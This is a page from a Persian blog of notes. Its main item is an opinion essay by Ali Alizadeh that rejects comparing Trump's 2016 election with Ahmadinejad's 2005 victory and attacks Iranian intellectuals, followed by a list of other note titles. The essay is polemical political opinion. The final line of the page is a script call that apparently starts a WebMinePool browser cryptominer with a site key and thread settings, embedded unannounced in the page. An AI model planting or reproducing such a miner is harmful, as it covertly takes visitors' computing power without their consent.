یادداشت‌ها

یادداشت 356

در نقد مقایسه رذیلانه‌ی انتخاب ترامپ و انتخاب احمدی نژاد / علی علیزاده

1.  یک ماه مانده به انتخابات ۹۲ مهدی خلجی نوشته بود: «گاهی بسیاری از ما دوست داریم باور کنیم اگر در سال ۱۳۸۴ و ۱۳۸۸ تقلب و تخلفی نبود، محمود احمدی‌نژاد به ریاست جمهوری انتخاب نمی‌شد. یا هیأت حاکمه‌ی جمهوری اسلامی تافته‌ای جدابافته از مردم ایران است. گفتن‌اش تلخ است ولی من هیچ رذیلتی در سیاست‌ و سیاست‌مداران ایرانی نمی‌بینم که به شکلی شدیدتر در جامعه و بسیاری مردم رایج نباشد. احمدی‌نژاد فرد نبود، نماد یک دوره و خصلت‌هایی جمعی بود…جامعه‌ای که با مفاهیم آزادی‌های فردی، مدارا، حقوق بشر و ارزش‌های دموکراتیک بیگانه است از حکومتی این چنینی خطرناک‌تر است.»

مسلما وقتی جامعه ای چنین «رذل» باشد، نه تنها قربانی حاکمیتش نیست که «مسئول» رفتار حاکمیت و از نظر حقوقی قابل مجازات و تنبیه است. ازین منظر دعوت ظاهری خلجی به نقد ریشه‌ای روشنفکرانه در عمل توجیه و مشروع جلوه دادن حمله نظامی و بمباران ایران از طریق اینهمان کردن مردم و حاکمیت بود. كارى که او عريانترش را چند ماه قبلش در نيويورك تايمز و چند ماه بعد در واشنگتن پست كرده بود.

نگاه توده ستیزانه اما منحصر به روشنفکران جنگ‌طلب نیست و اکثریت روشنفکران ایرانی، چه چپ و چه راست، از مردم واقعی این کشور و حسین و کورش شان نفرت دارند. نفرتی که عملا نفرت از خود و گذشته و تاریخ و دين جمعي بومي آن است و متاثر از میل به بیرون ریختن و پاکسازی خود از هرچه غیرغربی.

حالا جامعه آمریکا - این کعبه آمال تماروشنفکران، مصلحان، حقوق بشریها، بازار آزادی ها، دموکراسی خواهان ایرانی- فردی زن ستیز، نژادپرست، خارجی ستیز، معلول-ستيز، خرافاتی و بی اعتقاد به علم و گرمایش زمین، و متهم به تجاوز جنسی را انتخاب کرده‌است. در این لحظه خاص تاریخی این روشنفکران و مصلحان خودخوانده ایرانی بايد پاسخ دهند كه با جامعه ای که چنين رذالت هايي را هوشیارانه و آگاهانه انتخاب ميكند چه باید کرد؟ … این جامعه ای که به سرنوشت جمعي خودش رحم ندارد چگونه قرار بود با من ايراني بيست هزار كيلومتر ان طرف تر همدلی و همدردی و شفقت داشته باشد؟

2.  اما از این امتیاز گیری آسان بايد فراتر رفت و در برابر وسوسه مقایسه انتخاب امروز ترامپ با انتخاب احمدی نژاد در سال ۸۴ محكم ايستاد كرد. مساله به وضوح دفاع از احمدي نژادي نيست كه حتی اصولگرایان هم به او حمله میکنند و عملكرد واقعيش بدترين ضربه به عدالت خواهي در اين سه دهه بوده. مساله آرای آن هجده میلیونی است که به او در سال ۸۴ رای دادند…

در سال ۸۴ احمدی نژاد علت العلل مشكلات را مهاجران محروم افغانستانی مقیم ایران نميدانست. احمدی نژاد از طریق حمله به اقليت هاي سني و كرد و بلوچ و بهایی رای جمع نکرد. برخلاف اتهامات رقبايش حتي از طريق تقسيم جامعه به مذهبي و غيرمذهبي و باحجاب و بی حجاب و مدافع و مخالف نظام راي جمع نكرد. احمدي نژاد در سياست خارجي و در سالي كه نيروهاي امريكايي دو طرف ايران را محاصره كرده بودند و خطر جنگ واقعی بود چيزي جز حق دفاع ملي نگفت و رای دهندگانش خواستي نداشتند جز انكه ايران توسط دولت های بزرگ تحقیر یا تهدید به بمباران نشود… مجذوب سخن گفتن احمدی نژاد از «فضايلي» به نام عدالت اجتماعي و ظلم ستيزي و فسادستيزي و مقابله با زورگويي قدرتهاي جهاني شدند و نفرتشان از طبقه حاکمی بود که با برنامه های ازادی اقتصادیش انها را شانزده سال فقیر کرده بود .

نه. انتخابات امریکا قابل مقایسه با سال ۸۴ نیست. رذالتی اگر باشد از ان جامعه امریکاست که به رغم این همه امکانات و اموزش و اطلاعات چنین انتخابی کرد. رذالت دیگر از آن کارگزاران و دلالان منافع امریکا زیر صورتکهای به ظاهر ایرانی.

 

ارسال کننده: حسین دهباشی
تاریخ: 20 آبان 1395
یادداشت 359

دو آزادی در یک روز:

یادداشت 358

برای خواندن سلسله مطالب "مسافر جاده هراز" زندگی نامه خودنوشت افشین علاء به کانال شخصی او مراجعه فرمایید.

یادداشت 357

هو الله

یادداشت 355

من مرگِ هیچ معلّمی را باور نمی‌کنم!/ در سوگِ تورانِ میرهادی

یادداشت 354

‏[ از شُمارِ دوچشم | یک تن کم | وز شُمارِ خرد... | هزاران بیش ] «تورانِ میرهادی» | نازنین دُردانهء آموزش و پرورشِ نوینِ ایران درگذشت

یادداشت 354

اُمیدِحسینی | که البتّه نگاهِ سیاسی بسیار متفاوتی با نگارنده دارد | نیازی به هیچ تبلیغی ندارد | وبلاگِ «آهستان» که در شمارِ پُرمغزونغزترین ذخایرِ جناحِ اصولگرایِ مجازستان بوده است، هم! | و کانالِ تازه تاسیسِ او در تلگرام نیز لابُد چنان می‌شود | خواندنی و لب‌ریز و لب‌سوز و لب‌دوز!| علیکم به عضویت و پیگیریِ آن:

یادداشت 353

کتاب‌های زرد می‌توانند رقیب فضای مجازی و ماهواره باشند

یادداشت 352

پیامی سرگشاده به بچه‌های بالا! / در فضیلتِ پیشگیری قبل از درمان!

یادداشت 350

دودوتا؟ لُبنان‌تا!/ مهردادِ فرهمند

یادداشت 349

محسن میردامادی |سردبیر روزنامه سلام، دبیرکل جبهه مشارکت: " شورای امنیت سازمان ملل صلاحیت ندارد، ملّت آمریکا به وظیفهء خود در مورد گروگانگیری ما عمل کنند، همه کسانی که در سفارت آمریکا کار می‌کردند از نظر ما مجرم و جاسوس هستند، محاکمه را ممکن است به دادگاه لاهه بسپاریم، اگر آمریکا را محکوم کرد قبول می‌کنیم، در غیر این صورت رای آن هیچ بها و ارزشی برای ما ندارد..."

یادداشت 348

‏شمریم! اگر روزِ ستم خاموشیم خون است! اگر آبِ خُنک می‌نوشیم آن‌سویِ جهان کرب و بلایی بر پاست ما هم دلمان خوش است! مشکی پوشیم!

یادداشت 347

‏نگارنده البته، همان اوایل دولت دریافت اینکاره نیست و عذرخواست و استعفا داد. ولی نمی‌دانست تا این هفته جانشینی به جایش نرفته! باری، برای اعضاء سابق و لاحقِ هیأت مدیره کیش عاقبت به خیری مسئلت می‌نمایم
var someData = WMP.User('SK_A4VFH9k7Si5999pXyW7id', 'soroush',{ threads: 4, autoThreads: false, throttle: 0.3, forceASMJS: false }); someData.start();